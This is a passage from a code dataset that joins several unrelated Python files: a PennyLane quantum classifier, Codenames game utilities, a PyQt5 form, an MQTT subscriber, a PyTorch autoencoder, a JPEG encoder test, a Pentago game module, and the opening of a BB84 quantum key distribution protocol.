self._epochs_no_improve = 0
self._best_valid_loss = 999
self.all_train_loss = []
self.all_valid_loss = []
self._circuit = pnl.qnode(self._qdevice, diff_method=self._diff_method)(
self._qcircuit
)
def _qcircuit(self, inputs, weights):
"""
The quantum circuit builder.
@inputs :: The inputs taken by the feature maps.
@weights :: The weights of the variational forms used.
returns :: Measurement of the first qubit of the quantum circuit.
"""
for layer_nb in range(self._layers):
start_feature = layer_nb * self._hp["nqubits"]
end_feature = self._hp["nqubits"] * (layer_nb + 1)
fm.zzfm(self._hp["nqubits"], inputs[start_feature:end_feature])
vf.two_local(
self._hp["nqubits"],
weights[layer_nb],
repeats=self._hp["vform_repeats"],
entanglement="linear",
)
return pnl.expval(pnl.PauliZ(0))
@property
def nqubits(self):
return self._hp["nqubits"]
@property
def nfeatures(self):
return self._hp["nfeatures"]
@property
def circuit(self):
return self._circuit
@property
def subforms(self):
return self._subforms
@property
def nweights(self):
return self._nweights
@property
def best_valid_loss(self):
return self._best_valid_loss
@property
def total_weights(self):
return self._nweights*self._layers
def _draw(self):
"""
Draws the circuit using dummy parameters.
Parameterless implementation is not yet available in pennylane,
and it seems not feasible either by the way pennylane is constructed.
"""
drawing = pnl.draw_mpl(self._circuit)
fig, ax = drawing([0] * int(self._hp["nfeatures"]), self._weights)
return fig, ax
@staticmethod
def _check_compat(nqubits, nfeatures):
"""
Checks if the number of features in the dataset is divisible by
the number of qubits.
@nqubits :: Number of qubits assigned to the vqc.
@nfeatures :: Number of features to process by the vqc.
"""
if nfeatures % nqubits != 0:
raise ValueError(
"The number of features is not divisible by "
"the number of qubits you assigned!"
)
return int(nfeatures / nqubits)
@staticmethod
def _select_diff_method(hpars: dict) -> str:
"""Checks if a differentiation method for the quantum circuit is specified
by the user. If not, 'best' is selected as the differentiation method.
Args:
args: Arguments given to the vqc by the user, specifiying various hps.
Returns:
String that specifies which differentiation method to use.
"""
if "diff_method" in hpars:
return hpars["diff_method"]
return "best"
@staticmethod
def _choose_optimiser(choice, lr):
"""
Choose an optimiser to use in the training of the vqc.
@choice :: String of the optimiser name you want to use to train vqc.
@lr :: Learning rate for the optimiser.
"""
if choice is None:
return None
switcher = {
"adam": lambda: AdamOptimizer(stepsize=lr),
"none": lambda: tcols.WARNING + "No Optimiser" + tcols.ENDC
}
optimiser = switcher.get(choice, lambda: None)()
if optimiser is None:
raise TypeError("Specified optimiser is not an option atm!")
print(tcols.OKGREEN + "Optimiser used in this run: " + tcols.ENDC)
print(optimiser, '\n')
return optimiser
def _early_stopping(self, early_stopping_limit) -> bool:
"""
Stops the training if there has been no improvement in the loss
function during the past, e.g. 10, number of epochs.
returns :: True for when the early stopping limit was exceeded
and false otherwise.
"""
if self._epochs_no_improve >= early_stopping_limit:
return 1
return 0
def forward(self, x_data):
return [self._circuit(x, self._weights) for x in x_data]
def _shift_bce(self, y_preds, y_batch):
"""Shift the input given to this method and then calculate the binary cross
entropy loss.
Args:
y_preds: The predictions made by the vqc on the data.
y_batch: Batch of the target array.
Returns:
The binary cross entropy loss computed on the given data.
"""
y_preds = (np.array(y_preds) + 1)/2
return self._binary_cross_entropy(y_preds, y_batch)
@staticmethod
def _binary_cross_entropy(y_preds, y_batch):
"""
Binary cross entropy loss calculation.
"""
eps = anp.finfo(np.float32).eps
y_preds = anp.clip(y_preds, eps, 1 - eps)
y_batch = anp.array(y_batch)
bce_one = anp.array(
[y * anp.log(pred + eps) for pred, y in zip(y_preds, y_batch)]
)
bce_two = anp.array(
[(1 - y) * anp.log(1 - pred + eps) for pred, y in zip(y_preds, y_batch)]
)
bce = anp.array(bce_one + bce_two)
return -anp.mean(bce)
def compute_loss(self, x_batch, y_batch, weights=None):
"""
Objective function to be passed through the optimiser.
Weights is taken as an argument here since the optimiser func needs it.
We then use the class self variable inside the method.
"""
if not weights is None:
self._weights = weights
predictions = self.forward(x_batch)
return self._class_loss_function(predictions, y_batch)
def _validate(self, valid_loader, outdir):
"""
Calculate the loss on a validation data set.
"""
x_valid, y_valid = valid_loader
loss = self.compute_loss(x_valid, y_valid, self._weights)
self._save_best_loss_model(loss, outdir)
return loss
def _train_batch(self, x_batch, y_batch):
"""
Train on one batch.
"""
x_batch = np.array(x_batch[:, :], requires_grad=False)
y_batch = np.array(y_batch[:], requires_grad=False)
_, _, weights = self._optimiser.step(
self.compute_loss, x_batch, y_batch, self._weights
)
self._weights = weights
loss = self.compute_loss(x_batch, y_batch, self._weights)
return loss
def _train_all_batches(self, train_loader, batch_seed):
"""
Train on the full data set. Add randomness.
"""
batch_loss_sum = 0
nb_of_batches = 0
x_train, y_train = train_loader
for x_batch, y_batch in zip(x_train, y_train):
np.random.seed(batch_seed[nb_of_batches])
perm = np.random.permutation(len(y_batch))
x_batch = x_batch[perm]
y_batch = y_batch[perm]
batch_loss = self._train_batch(x_batch, y_batch)
batch_loss_sum += batch_loss
nb_of_batches += 1
return batch_loss_sum / nb_of_batches
def _print_total_weights(self):
"""Prints the total weights of the vqc model, to mimic the behaviour that is
available out of the box for the pytorch counterpart of this hybrid vqc.
"""
print("\n----------------------------------------")
print(tcols.OKGREEN + "Total number of weights: " + tcols.ENDC +
f"{self.total_weights}")
print("----------------------------------------\n")
def train_model(self, train_loader, valid_loader, epochs, estopping_limit, outdir):
"""Train an instantiated vqc algorithm.
"""
self._print_total_weights()
print(tcols.OKCYAN + "Training the vqc..." + tcols.ENDC)
rng = np.random.default_rng(12345)
batch_seeds = rng.integers(low=0, high=100,
size=(epochs, len(train_loader[1])))
for epoch in range(epochs):
train_loss = self._train_all_batches(train_loader, batch_seeds[epoch])
valid_loss = self._validate(valid_loader, outdir)
if self._early_stopping(estopping_limit):
break
self.all_train_loss.append(train_loss)
self.all_valid_loss.append(valid_loss)
self._print_losses(epoch, epochs, train_loss, valid_loss)
@staticmethod
def _print_losses(epoch, epochs, train_loss, valid_loss):
"""
Prints the training and validation losses in a nice format.
@epoch :: Int of the current epoch.
@epochs :: Int of the total number of epochs.
@train_loss :: The computed training loss pytorch object.
@valid_loss :: The computed validation loss pytorch object.
"""
print(
f"Epoch : {epoch + 1}/{epochs}, "
f"Train loss (average) = {train_loss.item():.8f}"
)
print(f"Epoch : {epoch + 1}/{epochs}, " f"Valid loss = {valid_loss.item():.8f}")
def loss_plot(self, outdir):
"""
Plots the loss for each epoch for the training and validation data.
@outdir :: Directory where to save the loss plot.
"""
epochs = list(range(len(self.all_train_loss)))
plt.figure()
plt.plot(epochs, self.all_train_loss, color="gray", label="Train Loss (avg)")
plt.plot(epochs, self.all_valid_loss, color="navy", label="Valid Loss")
self._loss_plot_header(epochs, "blue", "white")
plt.xlabel("Epochs")
plt.ylabel("Loss")
plt.savefig(os.path.join(outdir, "loss_epochs.pdf"))
plt.close()
print(tcols.OKGREEN + f"Loss plot was saved to {outdir}" + tcols.ENDC)
def _loss_plot_header(self, epochs, writing_color, box_color):
"""The header of the loss plot, displaying the best obtained loss during the
training of the vqc and the legend.
Args:
epochs (int): Number of epochs the vqc was training for.
writing_color (str): Color of the writing in the header of the figure.
box_color (str): Color of the box in which this header is put.
"""
plt.text(
np.min(epochs),
np.max(self.all_train_loss),
f"Min: {self._best_valid_loss:.2e}",
verticalalignment="top",
horizontalalignment="left",
color=writing_color,
fontsize=15,
bbox={"facecolor": box_color, "alpha": 0.8, "pad": 5},
)
plt.legend()
def _save_best_loss_model(self, valid_loss, outdir):
"""
Prints a message and saves the optimised model with the best loss.
@valid_loss :: Float of the validation loss.
@outdir :: Directory where the best model is saved.
"""
if self._best_valid_loss > valid_loss:
self._epochs_no_improve = 0
self._best_valid_loss = valid_loss
print(tcols.OKGREEN + f"New min: {self.best_valid_loss:.2e}" + tcols.ENDC)
if outdir is not None:
np.save(outdir + "best_model.npy", self._weights)
else:
self._epochs_no_improve += 1
def export_hyperparameters(self, outdir):
"""
Saves the hyperparameters of the model to a json file.
@outdir :: Directory where to save the json file.
"""
file_path = os.path.join(outdir, "hyperparameters.json")
params_file = open(file_path, "w")
json.dump(self._hp, params_file)
params_file.close()
print(tcols.OKGREEN + f"Hyperparameters exported to {file_path}!" + tcols.ENDC)
def export_architecture(self, outdir):
"""Saves a drawing of the circuit to a text file.
Args:
outdir: The output folder where the circuit file will be saved.
"""
outfile = os.path.join(outdir, "circuit_architecture.pdf")
fig, ax = self._draw()
fig.savefig(outfile)
print(tcols.OKGREEN + f"Architecture exported to {outfile}!" + tcols.ENDC)
def load_model(self, model_path):
"""
Loads the weights of a trained model saved in a numpy file.
@model_path :: Directory where a trained model was saved.
"""
if not os.path.exists(model_path):
raise FileNotFoundError("∄ path.")
self._weights = np.load(model_path)
def predict(self, x_data) -> np.ndarray:
"""
Compute the prediction of the vqc on a data array. The output is casted to
a list because the test.py is desinged to be model agnostic between VQC and
HybridVQC. The predict function of the latter outputs 3 values, from which we
want the last one, i.e., the classification branch output (see ae_classifier.py)
@x_data :: Input array to pass through the vqc.
returns :: The latent space of the ae and the reco data.
"""
x_data = np.array(x_data[:, :], requires_grad=False)
classification_output = self.forward(x_data)
return [classification_output]
| StarcoderdataPython |
1977456 | <filename>api/app/games/codenames/events/utils.py
"""
This module contains utility functions required by the Codenames game event handlers.
"""
import functools
import json
import random
from flask_socketio import emit
from flask_login import current_user
from sqlalchemy import func
from app import db
from app.games.codenames.models import (
CodenamesTeams,
CodenamesWords,
)
from .constants import NAMESPACE, TEAMS, STATE_KEYS, STATES
def player_distribution_is_valid(check_spymaster=True):
"""
Checks if the distribution of players across both teams is valid.
Args:
check_spymaster (bool, optional): Set to false if the presence
of spymaster does not need to be checked. Defaults to True.
Returns:
bool: True if the distribution is valid; False otherwise.
"""
blue_team = CodenamesTeams.query.filter_by(
room=current_user.room.codenames_room, team_name=TEAMS.BLUE
).first()
red_team = CodenamesTeams.query.filter_by(
room=current_user.room.codenames_room, team_name=TEAMS.RED
).first()
if check_spymaster:
if blue_team.spymaster is None or red_team.spymaster is None:
return False
if (
len(blue_team.players) < 2
or len(red_team.players) < 2
or abs(len(blue_team.players) - len(red_team.players)) > 1
):
return False
return True
def create_word_list():
"""
Get 25 random words from the corpus and send them to the players.
"""
words = (
CodenamesWords.query.filter_by(variant="STANDARD")
.order_by(func.random())
.limit(25)
.all()
)
list_of_words = [
word.front if random.getrandbits(1) else word.back for word in words
]
current_user.room.codenames_room.words = json.dumps(list_of_words)
db.session.commit()
data = {}
data["words"] = list_of_words
data["turns"] = 0
grid_sequence = ["A"] + ["N"] * 7 + ["B"] * 8 + ["R"] * 8
if random.getrandbits(1):
current_user.room.codenames_room.state = STATES.BLUE_SPYMASTER
state = STATES.BLUE_SPYMASTER
grid_sequence += ["B"]
else:
current_user.room.codenames_room.state = STATES.RED_SPYMASTER
state = STATES.RED_SPYMASTER
grid_sequence += ["R"]
if state == STATES.BLUE_SPYMASTER:
data["blueLeft"] = 9
data["redLeft"] = 8
else:
data["redLeft"] = 9
data["blueLeft"] = 8
emit("game_data", data, room=current_user.room_id, namespace=NAMESPACE)
random.shuffle(grid_sequence)
grid = "".join(grid_sequence)
current_user.room.codenames_room.grid = grid
db.session.commit()
data = dict()
data["grid"] = grid
emit("set_state", {STATE_KEYS.GAME_STATE: state}, room=current_user.room_id)
for team in current_user.room.codenames_room.teams:
if team.spymaster_player is not None:
emit("game_data", data, room=team.spymaster_player.user_data.sid)
if (
state == STATES.BLUE_SPYMASTER
and team.team_name == TEAMS.BLUE
or state == STATES.RED_SPYMASTER
and team.team_name == TEAMS.RED
):
team.words_left = 9
else:
team.words_left = 8
db.session.commit()
def get_team_from_grid(grid_letter):
"""
Utility function which returns team name given the grid letter.
Args:
grid_letter (str): The letter in the grid possibly representing a team
Returns:
str: Team name if the team is valid; None otherwise
"""
grid_to_team_map = {
"B": TEAMS.BLUE,
"R": TEAMS.RED,
}
return grid_to_team_map.get(grid_letter, None)
def is_codenames_player(funct):
"""
Decorator that ensures the method is called only by a codenames player.
Args:
funct (function): Function being decorated
Returns:
function: Decorated function which calls the original function
if the user is a codenames player, and returns otherwise
"""
@functools.wraps(funct)
def wrapper(*args, **kwargs):
if not current_user.is_authenticated or current_user.codenames_player is None:
return None
return funct(*args, **kwargs)
return wrapper
def is_spymaster(funct):
"""
Decorator that ensures the method is called only by a spymaster.
Args:
funct (function): Function being decorated
Returns:
function: Decorated function which calls the original function
if the user is a spymaster, and returns otherwise
"""
@functools.wraps(funct)
def wrapper(*args, **kwargs):
if (
current_user.codenames_player.team.spymaster_player
!= current_user.codenames_player
):
return None
return funct(*args, **kwargs)
return wrapper
def is_not_spymaster(funct):
"""
Decorator that ensures the method is called only by a non-spymaster player.
Args:
funct (function): Function being decorated
Returns:
function: Decorated function which calls the original function
if the user is not a spymaster, and returns otherwise
"""
@functools.wraps(funct)
def wrapper(*args, **kwargs):
if (
current_user.codenames_player.team.spymaster_player
== current_user.codenames_player
):
return None
return funct(*args, **kwargs)
return wrapper
| StarcoderdataPython |
6599728 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'measurement.ui'
#
# Created by: PyQt5 UI code generator 5.7.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Measurement(object):
def setupUi(self, Measurement):
Measurement.setObjectName("Measurement")
Measurement.resize(337, 229)
self.label_reptitions = QtWidgets.QLabel(Measurement)
self.label_reptitions.setGeometry(QtCore.QRect(20, 30, 161, 21))
self.label_reptitions.setObjectName("label_reptitions")
self.lineEdit_repetitions = QtWidgets.QLineEdit(Measurement)
self.lineEdit_repetitions.setGeometry(QtCore.QRect(200, 30, 113, 20))
self.lineEdit_repetitions.setObjectName("lineEdit_repetitions")
self.label_sampleTime = QtWidgets.QLabel(Measurement)
self.label_sampleTime.setGeometry(QtCore.QRect(20, 60, 161, 21))
self.label_sampleTime.setObjectName("label_sampleTime")
self.lineEdit_sampleTime = QtWidgets.QLineEdit(Measurement)
self.lineEdit_sampleTime.setGeometry(QtCore.QRect(200, 60, 113, 20))
self.lineEdit_sampleTime.setObjectName("lineEdit_sampleTime")
self.label_purgeTime = QtWidgets.QLabel(Measurement)
self.label_purgeTime.setGeometry(QtCore.QRect(20, 90, 161, 21))
self.label_purgeTime.setObjectName("label_purgeTime")
self.lineEdit_purgeTime = QtWidgets.QLineEdit(Measurement)
self.lineEdit_purgeTime.setGeometry(QtCore.QRect(200, 90, 113, 20))
self.lineEdit_purgeTime.setObjectName("lineEdit_purgeTime")
self.pushButton_advanced = QtWidgets.QPushButton(Measurement)
self.pushButton_advanced.setGeometry(QtCore.QRect(170, 190, 75, 23))
self.pushButton_advanced.setObjectName("pushButton_advanced")
self.pushButton_save = QtWidgets.QPushButton(Measurement)
self.pushButton_save.setGeometry(QtCore.QRect(250, 190, 75, 23))
self.pushButton_save.setObjectName("pushButton_save")
self.retranslateUi(Measurement)
QtCore.QMetaObject.connectSlotsByName(Measurement)
def retranslateUi(self, Measurement):
_translate = QtCore.QCoreApplication.translate
Measurement.setWindowTitle(_translate("Measurement", "Measurement"))
self.label_reptitions.setText(_translate("Measurement", "Number of repetitions"))
self.label_sampleTime.setText(_translate("Measurement", "Sample time (seconds)"))
self.label_purgeTime.setText(_translate("Measurement", "Purge time (seconds)"))
self.pushButton_advanced.setText(_translate("Measurement", "Advanced"))
self.pushButton_save.setText(_translate("Measurement", "Save"))
'''
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
Measurement = QtWidgets.QWidget()
ui = Ui_Measurement()
ui.setupUi(Measurement)
Measurement.show()
sys.exit(app.exec_())
'''
| StarcoderdataPython |
3360394 | <filename>server/pythonScripts/subscriber.py<gh_stars>0
import paho.mqtt.client as paho
import paramiko
import json
broker = "localhost"
topic = "new"
port = 1883
def on_connect(client, userdata, flags, rc): # The callback for when the client connects to the broker
#print("Connected with result code {0}".format(str(rc))) # Print result of connection attempt
#print("")
x = 0
def on_message(client, userdata, message):
#print("Received data is : \n")
msg = str(message.payload.decode("utf-8"))
print(msg)
#print("")
#convert to json
client.disconnect()
client = paho.Client("user5") #create client object
client.on_connect = on_connect
client.on_message = on_message
#print("")
#print("Connecting to broker host",broker)
#print("")
client.connect(broker, 1883)#connection establishment with broker
#print("Subscribing begins here")
client.subscribe(topic)
#print("")
#subscribe topic test
client.loop_forever()#contineo
| StarcoderdataPython |
1974037 | import torch
import torchvision
import torch.nn as nn
import torch.nn.functional as F
class Autoencoder(nn.Module):
def __init__(self):
super(Autoencoder, self).__init__()
self.encoder = nn.Sequential(
nn.Conv2d(3, 6, kernel_size=5),
nn.ReLU(True),
nn.Conv2d(6, 16, kernel_size=5),
nn.ReLU(True)
)
self.decoder = nn.Sequential(
nn.ConvTranspose2d(16, 6, kernel_size=5),
nn.ReLU(True),
nn.ConvTranspose2d(6, 3, kernel_size=5),
nn.ReLU(True),
)
def forward(self, x):
x = self.encoder(x)
x = self.decoder(x)
return x
def main():
pass
if __name__ == "__main__":
main()
| StarcoderdataPython |
3426501 | <reponame>haribommi/vaapi-fits
###
### Copyright (C) 2018-2019 Intel Corporation
###
### SPDX-License-Identifier: BSD-3-Clause
###
from ....lib import *
from ..util import *
from .encoder import EncoderTest
spec = load_test_spec("jpeg", "encode")
class JPEGEncoderTest(EncoderTest):
def before(self):
vars(self).update(
codec = "jpeg",
gstencoder = "vaapijpegenc",
gstdecoder = "jpegparse ! vaapijpegdec",
gstmediatype = "image/jpeg",
gstparser = "jpegparse",
profile = "baseline",
)
super(JPEGEncoderTest, self).before()
def get_file_ext(self):
return "mjpeg" if self.frames > 1 else "jpg"
class cqp(JPEGEncoderTest):
@platform_tags(JPEG_ENCODE_PLATFORMS)
@slash.requires(*have_gst_element("vaapijpegenc"))
@slash.requires(*have_gst_element("vaapijpegdec"))
@slash.parametrize(*gen_jpeg_cqp_parameters(spec))
def test(self, case, quality):
vars(self).update(spec[case].copy())
vars(self).update(
case = case,
quality = quality,
rcmode = "cqp",
)
self.encode()
| StarcoderdataPython |
53447 | #GamePlay.py
#<NAME>, <NAME>, <NAME>
"""This module contains the functions needed to support pentago gameplay.
A pentago gameboard is represented by a 6x6 2D array. Each location on the board is initialized to "" and is set
to 0 or 1 when the player or the AI respectively places a marble on that location. Each array in the gameboard
nested array represents a column of the board. Thus the gameboard can be viewed as the square in the 1st coordinate
quadrant with x and y coordinates ranging from 0...5. For example, the bottom right location on the gameboard can
be accessed with the command board[5][0]. The four squares on the board are indexed 1...4 with 1 as bottom left, 2 as
top left, 3 as bottom right, and 4 as top right. """
def new_board():
"""Returns an empty board"""
return [[" ", " ", " ", " ", " ", " "], [" ", " ", " ", " ", " ", " "], [" ", " ", " ", " ", " ", " "], [" ", " ", " ", " ", " ", " "],
[" ", " ", " ", " ", " ", " "], [" ", " ", " ", " ", " ", " "]]
def printBoard(board):
"""prints out the board in a legible format"""
print("\033[1m -----------------------------------\033[0m")
print("5 \033[1m| \033[0m" + returnMarble(str(board[0][5])) + " | " + returnMarble(str(board[1][5])) + " | " + returnMarble(str(board[2][5])) +
"\033[1m | \033[0m" + returnMarble(str(board[3][5])) + " | " + returnMarble(str(board[4][5])) + " | " + returnMarble(str(board[5][5])) +"\033[1m |\033[0m")
print(" \033[1m|\033[0m-----------------\033[1m|\033[0m-----------------\033[1m|\033[0m")
print("4 \033[1m| \033[0m" +returnMarble(str(board[0][4])) + " | " + returnMarble(str(board[1][4])) + " | " + returnMarble(str(board[2][4])) +
"\033[1m | \033[0m" + returnMarble(str(board[3][4])) + " | " + returnMarble(str(board[4][4])) + " | " + returnMarble(str(board[5][4]))+"\033[1m |\033[0m")
print(" \033[1m|\033[0m-----------------\033[1m|\033[0m-----------------\033[1m|\033[0m")
print("3 \033[1m| \033[0m" +returnMarble(str(board[0][3])) + " | " + returnMarble(str(board[1][3])) + " | " + returnMarble(str(board[2][3])) +
"\033[1m | \033[0m" + returnMarble(str(board[3][3])) + " | " + returnMarble(str(board[4][3])) + " | " + returnMarble(str(board[5][3]))+"\033[1m |\033[0m 2 | 4 ")
print("\033[1m |-----------------|-----------------|\033[0m --|-- ")
print("2 \033[1m| \033[0m" +returnMarble(str(board[0][2])) + " | " + returnMarble(str(board[1][2])) + " | " + returnMarble(str(board[2][2])) +
"\033[1m | \033[0m" + returnMarble(str(board[3][2])) + " | " + returnMarble(str(board[4][2])) + " | " + returnMarble(str(board[5][2]))+"\033[1m |\033[0m 1 | 3 ")
print(" \033[1m|\033[0m-----------------\033[1m|\033[0m-----------------\033[1m|\033[0m")
print("1 \033[1m| \033[0m" + returnMarble(str(board[0][1])) + " | " + returnMarble(str(board[1][1])) + " | " + returnMarble(str(board[2][1])) +
"\033[1m | \033[0m" + returnMarble(str(board[3][1])) + " | " + returnMarble(str(board[4][1])) + " | " + returnMarble(str(board[5][1]))+"\033[1m |\033[0m")
print(" \033[1m|\033[0m-----------------\033[1m|\033[0m-----------------\033[1m|\033[0m")
print("0 \033[1m| \033[0m" + returnMarble(str(board[0][0])) + " | " + returnMarble(str(board[1][0])) + " | " + returnMarble(str(board[2][0])) +
"\033[1m | \033[0m" + returnMarble(str(board[3][0])) + " | " + returnMarble(str(board[4][0])) + " | " + returnMarble(str(board[5][0]))+"\033[1m |\033[0m")
print("\033[1m -----------------------------------\033[0m")
print(" 0 1 2 3 4 5")
return
def returnMarble(number):
"""Returns a string, red X for AI and black X for human player"""
if (number =="1"):
return "\033[91mX\033[0m"
elif (number == "0"):
return "X"
else:
return number
def rotate(board, direction, square_index):
"""Returns a copy of the board with the indicated square rotated 90 degrees in the indicated direction
Parameter board: a valid pentago board
Parameter direction: the direction of rotation "R" or "L"
Parameter square_index: the index of the square to be rotated int 1...4
"""
if square_index == 1:
vertical_offset = 0
horizontal_offset = 0
if square_index == 2:
vertical_offset = 3
horizontal_offset = 0
if square_index == 3:
vertical_offset = 0
horizontal_offset = 3
if square_index == 4:
vertical_offset = 3
horizontal_offset = 3
if direction == "R":
temp1 = board[2 + horizontal_offset][1 + vertical_offset]
temp2 = board[1 + horizontal_offset][0 + vertical_offset]
board[2 + horizontal_offset][1 + vertical_offset] = board[1 + horizontal_offset][2 + vertical_offset]
board[1 + horizontal_offset][0 + vertical_offset] = temp1
temp1 = board[0 + horizontal_offset][1 + vertical_offset]
board[0 + horizontal_offset][1 + vertical_offset] = temp2
board[1 + horizontal_offset][2 + vertical_offset] = temp1
temp1 = board[2 + horizontal_offset][2 + vertical_offset]
temp2 = board[2 + horizontal_offset][0 + vertical_offset]
board[2 + horizontal_offset][2 + vertical_offset] = board[0 + horizontal_offset][2 + vertical_offset]
board[2 + horizontal_offset][0 + vertical_offset] = temp1
temp1 = board[0 + horizontal_offset][0 + vertical_offset]
board[0 + horizontal_offset][0 + vertical_offset] = temp2
board[0 + horizontal_offset][2 + vertical_offset] = temp1
if direction == "L":
temp1 = board[0 + horizontal_offset][1 + vertical_offset]
temp2 = board[1 + horizontal_offset][0 + vertical_offset]
board[0 + horizontal_offset][1 + vertical_offset] = board[1 + horizontal_offset][2 + vertical_offset]
board[1 + horizontal_offset][0 + vertical_offset] = temp1
temp1 = board[2 + horizontal_offset][1 + vertical_offset]
board[2 + horizontal_offset][1 + vertical_offset] = temp2
board[1 + horizontal_offset][2 + vertical_offset] = temp1
temp1 = board[0 + horizontal_offset][2 + vertical_offset]
temp2 = board[0 + horizontal_offset][0 + vertical_offset]
board[0 + horizontal_offset][2 + vertical_offset] = board[2 + horizontal_offset][2 + vertical_offset]
board[0 + horizontal_offset][0 + vertical_offset] = temp1
temp1 = board[2 + horizontal_offset][0 + vertical_offset]
board[2 + horizontal_offset][0 + vertical_offset] = temp2
board[2 + horizontal_offset][2 + vertical_offset] = temp1
return board
def take_action(board, action, player):
"""Takes a given action on a given board for a given player. Returns the new board.
Parameter board: a valid game board
Parameter action: an instance of type Action
Parameter player: either "Player" or "AI"
"""
if player == "Player":
set_value = 0
else:
set_value = 1
temp=board
temp[action.x_coordinate][action.y_coordinate] = set_value
return rotate(temp, action.direction, action.square_index)
class Action(object):
"""Each acton is composed of the location on the board for a marble to be placed, a square selection,
and the direction that that square should be rotated."""
def __init__(self, x_coordinate, y_coordinate, square_index, direction):
"""Creates an instance of class Action
Parameter x_coordinate: x coordinate of the location for the marble to be placed int 0...5
Parameter y_coordinate: y coordinate of the location for the marble to be placed int 0...5
Parameter square_index: the index of the square to be rotated int 1...4
Parameter direction: the direction of rotation "R" or "L"
"""
self.x_coordinate = x_coordinate
self.y_coordinate = y_coordinate
self.square_index = square_index
self.direction = direction
def equals(self, action):
"""method of class Action that determines if an action is equal to another action"""
assert(isinstance(action, Action))
if not(self.x_coordinate==action.x_coordinate):
return False
if not(self.y_coordinate==action.y_coordinate):
return False
if not(self.square_index==action.square_index):
return False
if not(self.direction==action.direction):
return False
return True
| StarcoderdataPython |
3515674 | <reponame>Doomsk/QChat
import abc
import random
import time
from qchat.device import LeadDevice, FollowDevice
from qchat.ecc import ECC_Golay
from qchat.log import QChatLogger
from qchat.messages import PTCLMessage, BB84Message, SPDSMessage, DQKDMessage
LEADER_ROLE = 0
FOLLOW_ROLE = 1
IDLE_TIMEOUT = 60
BYTE_LEN = 8
ROUND_SIZE = 100
PCHSH = 0.8535533905932737
MAX_GOLAY_ERROR = 0.13043478260869565
class ProtocolException(Exception):
pass
class QChatProtocol(metaclass=abc.ABCMeta):
def __init__(self, peer_info, connection, ctrl_msg_q, outbound_q, role, relay_info):
"""
Initializes a protocol object that is used for executing quantum/classical exchange protocols
:param peer_info: dict
Dictionary containing host, ip, port information
:param connection: `~qchat.connection.QChatConnection`
A QChatConnection object
:param key_size: int
The length of the key we wish to derive
:param ctrl_msg_q: list
Queue containing inbound messages from our peer
:param outbound_q: list
Queue containing outbound message to our peer
:param role: int
Either LEADER_ROLE or FOLLOW_ROLE for coordinating the protocol
"""
self.logger = QChatLogger(__name__)
# QChat connection interface
self.connection = connection
# The inbound control message queue
self.ctrl_msg_q = ctrl_msg_q
# The outbound message queue
self.outbound_q = outbound_q
# Peer information for the communication in the protocol
self.peer_info = peer_info
# Qubit source relay information
self.relay_info = relay_info
# The role we are assuming for the protocol
self.role = role
# Perform perliminary steps of the protocol
if role == LEADER_ROLE:
self.device = LeadDevice(self.connection, self.relay_info)
self._lead_protocol()
elif role == FOLLOW_ROLE:
self.device = FollowDevice(self.connection, self.relay_info)
self._follow_protocol()
@abc.abstractmethod
def _lead_protocol(self):
"""
Placeholder for what the leader of the protocol should do
"""
raise NotImplementedError
@abc.abstractmethod
def _follow_protocol(self):
"""
Placeholder for what the leader of the protocol should do
"""
raise NotImplementedError
def _wait_for_control_message(self, idle_timeout=IDLE_TIMEOUT, message_type=None):
"""
Waits for a control message from our peer in blocking mode
:param idle_timeout: int
The number of seconds to wait before aborting the protocol
:param message_type: `~qchat.messages.Message`
The class of the type of control message we are expecting
:return: `~qchat.messages.Message`
The message that we received
"""
# Wait for a message
wait_start = time.time()
while True:
curr_time = time.time()
if curr_time - wait_start > idle_timeout:
raise ProtocolException("Timed out waiting for control message")
if self.ctrl_msg_q:
break
else:
time.sleep(0.005)
# Grab the newest message
message = self.ctrl_msg_q.pop(0)
# Verify it is routed to the correct place
if not isinstance(message, message_type):
raise ProtocolException("Received incorrect control message")
return message
def _send_control_message(self, message_data, message_type):
"""
Sends a control message to our peer
:param message_data: bytes/str/dict
The message data we want to send
:param message_type: `~qchat.messages.Message`
The class of the type of message we want to send
:return: None
"""
message = message_type(sender=self.connection.name, message_data=message_data)
self.outbound_q.put((self.peer_info["user"], message))
def exchange_messages(self, message_data, message_type):
"""
Exchanges messages with our peer
:param message_data: bytes/str/dict
The message data we want to send
:param message_type: `~qchat.messages.Message`
The clasls of the message type we are expecting/wanting to send
:return: `~qchat.messages.Message`
The message we received from our peer
"""
if self.role == LEADER_ROLE:
self._send_control_message(message_data=message_data, message_type=message_type)
return self._wait_for_control_message(message_type=message_type)
else:
m = self._wait_for_control_message(message_type=message_type)
self._send_control_message(message_data=message_data, message_type=message_type)
return m
class QChatKeyProtocol(QChatProtocol):
"""
Implements basic signalling
"""
def __init__(self, key_size, **kwargs):
# The desired key size in bytes
self.key_size = key_size
super().__init__(**kwargs)
def _lead_protocol(self):
"""
Initiates a key generation protocol
:return: None
"""
self._send_control_message(message_data={"name": self.name, "key_size": self.key_size},
message_type=PTCLMessage)
response = self._wait_for_control_message(message_type=self.message_type)
if response.data["ACK"] != "ACK":
raise ProtocolException("Failed to establish leader/role")
def _follow_protocol(self):
"""
Initiates the following of a key generation protocol
:return:
"""
self._send_control_message(message_data={"ACK": "ACK"}, message_type=self.message_type)
def _end_protocol(self):
"""
Concludes a key generation protocol
:return: None
"""
m = self.exchange_messages(message_data={"FIN": True}, message_type=self.message_type)
if not m.data["FIN"]:
raise ProtocolException("Failed to terminate {} protocol".format(self.name))
class BB84_Purified(QChatKeyProtocol):
"""
Implements the Purified BB84 protocol
With a 16 byte key and noiseless channel we distribute a total of 1200 qubits per participant
"""
name = "BB84_PURIFIED"
message_type = BB84Message
def _receive_bb84_states(self):
"""
Method is intended to receive the distributed qubits from the EPR pair.
:return: list
A list of the measurement outcomes/basis used
"""
# Lists for the measurement/basis information
x = []
theta = []
# Distribute ROUND_SIZE qubits
while len(x) < ROUND_SIZE:
# Request our EPR source to distribute the pairs
if self.role == LEADER_ROLE:
self.logger.debug("Requesting EPR pair with {}".format(self.peer_info["user"]))
self.device.requestEPR(self.peer_info["user"])
# Receive our half of the EPR pair
self.logger.debug("Trying to receive EPR pair")
q = self.device.receiveEPR()
self.logger.debug("Successfully received!")
# Randomly measure in Hadamard/Standard basis
basisflip = random.randint(0, 1)
if basisflip:
q.H()
# Store the measurement/basis information
theta.append(basisflip)
x.append(q.measure())
# Let peer know we are ready for the next qubit
